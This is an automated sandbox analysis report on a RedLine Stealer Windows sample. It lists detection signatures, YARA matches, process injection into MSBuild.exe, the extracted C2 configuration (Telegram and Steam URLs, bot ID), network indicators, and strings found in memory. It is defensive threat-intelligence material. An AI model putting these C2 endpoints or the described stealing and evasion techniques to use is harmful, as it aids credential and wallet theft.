Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CCdaw0qbbo.exe

Overview

General Information

Sample name:CCdaw0qbbo.exe
renamed because original name is a hash value
Original sample name:1c7fa29f87c23abfa490a5e8909a310a.exe
Analysis ID:1483330
MD5:1c7fa29f87c23abfa490a5e8909a310a
SHA1:35c09cc093085c3924cab4c34572387d920ac185
SHA256:3e0b58b606aeb4cbf53aa42f471ae31960309cb01e2a3872b1db400c9694012b
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CCdaw0qbbo.exe (PID: 6788 cmdline: "C:\Users\user\Desktop\CCdaw0qbbo.exe" MD5: 1C7FA29F87C23ABFA490A5E8909A310A)
    • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["https://t.me/+J_Z1QGHfHko0MGZi*https://steamcommunity.com/id/elcadillac"], "Bot Id": "7371156009_99"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x268:$pat14: , CommandLine:
    • 0x162dd:$v2_1: ListOfProcesses
    • 0x160cb:$v4_3: base64str
    • 0x16c8f:$v4_4: stringKey
    • 0x146d1:$v4_5: BytesToStringConverted
    • 0x12b71:$v4_6: FromBase64
    • 0x14cd0:$v4_8: procName
    • 0x144ce:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
    00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CCdaw0qbbo.exe PID: 6788JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.CCdaw0qbbo.exe.6e37a000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0.2.CCdaw0qbbo.exe.6e37a000.4.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x144dd:$v2_1: ListOfProcesses
            • 0x142cb:$v4_3: base64str
            • 0x14e8f:$v4_4: stringKey
            • 0x128d1:$v4_5: BytesToStringConverted
            • 0x10d71:$v4_6: FromBase64
            • 0x12ed0:$v4_8: procName
            • 0x126ce:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
            0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x268:$pat14: , CommandLine:
              • 0x162dd:$v2_1: ListOfProcesses
              • 0x160cb:$v4_3: base64str
              • 0x16c8f:$v4_4: stringKey
              • 0x146d1:$v4_5: BytesToStringConverted
              • 0x12b71:$v4_6: FromBase64
              • 0x14cd0:$v4_8: procName
              • 0x144ce:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
              2.2.MSBuild.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Silenttrinity Stager Msbuild Activity
                Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7060, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-27T01:36:55.043720+0200
                SID:2001689
                Source Port:49731
                Destination Port:3306
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-27T01:36:55.993125+0200
                SID:2046105
                Source Port:49731
                Destination Port:3306
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-27T01:36:55.749095+0200
                SID:2046105
                Source Port:49731
                Destination Port:3306
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-27T01:36:57.930177+0200
                SID:2049282
                Source Port:3306
                Destination Port:49731
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: CCdaw0qbbo.exeAvira: detected
                Found malware configuration
                Source: 0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["https://t.me/+J_Z1QGHfHko0MGZi*https://steamcommunity.com/id/elcadillac"], "Bot Id": "7371156009_99"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\d3d9.dllReversingLabs: Detection: 70%
                Multi AV Scanner detection for submitted file
                Source: CCdaw0qbbo.exeReversingLabs: Detection: 83%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\d3d9.dllJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: CCdaw0qbbo.exeJoe Sandbox ML: detected
                Source: CCdaw0qbbo.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: CCdaw0qbbo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://t.me/+J_Z1QGHfHko0MGZi*https://steamcommunity.com/id/elcadillac
                Source: global trafficTCP traffic: 192.168.2.4:49731 -> 157.90.30.125:3306
                Source: global trafficHTTP traffic detected: GET /+J_Z1QGHfHko0MGZi HTTP/1.1Host: t.meConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /+J_Z1QGHfHko0MGZi HTTP/1.1Host: t.meConnection: Keep-Alive
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $kq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                Source: CCdaw0qbbo.exeString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                Source: CCdaw0qbbo.exe, 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: token_servicegIndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: up.nexgor.top
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
